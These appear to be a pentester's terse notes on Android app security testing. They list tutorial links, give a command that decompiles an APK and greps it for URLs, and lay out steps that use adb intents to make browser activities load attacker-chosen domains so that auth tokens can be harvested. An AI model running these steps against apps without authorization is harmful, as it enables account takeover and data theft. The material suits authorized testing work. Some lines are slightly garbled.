- https://www.hackingarticles.in/android-penetration-testing-apk-reverse-engineering/
- https://www.hackingarticles.in/android-penetration-testing-apk-reversing-part-2/
- https://www.hackingarticles.in/android-pentest-deep-link-exploitation/
- https://www.hackingarticles.in/android-penetration-testing-webview-attacks/
- https://www.hackingarticles.in/android-penetration-testing-frida/
- https://www.hackingarticles.in/android-pentest-lab-setup-adb-command-cheatsheet/
- https://www.hackingarticles.in/android-hooking-and-sslpinning-using-objection-framework/
- https://www.hackingarticles.in/android-penetration-testing-drozer/
- https://www.hackingarticles.in/android-pentest-automated-analysis-using-mobsf/
apktool -d com.uber -o uberAPK; grep -Phro "(https?://)[\w\,-/]+[\"\']" uberAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"- Download jadx decompiler and install adb
- Open AndroidManifest.xml
- Find all browser activities (must contain )
- Run "adb shell am start -n app_package_name/component_name -a android.intent.action.VIEW -d http://google.com" for each of the activities (or any of your domains). Also track in Burp any requests to http://google.com or your domain
- If a domain is opened, it means you found a vulnerability! Now inspect the request if it contains any auth tokens (if yes, it means you've got an account takeover!). No? Try different techniques to obtain any PII. In the worst case you will get a reward like for an XSS
- If you can just open arbitrary links in an app. And use http://google.com (remove the space) in the 4 step.
Android Reverse Engineering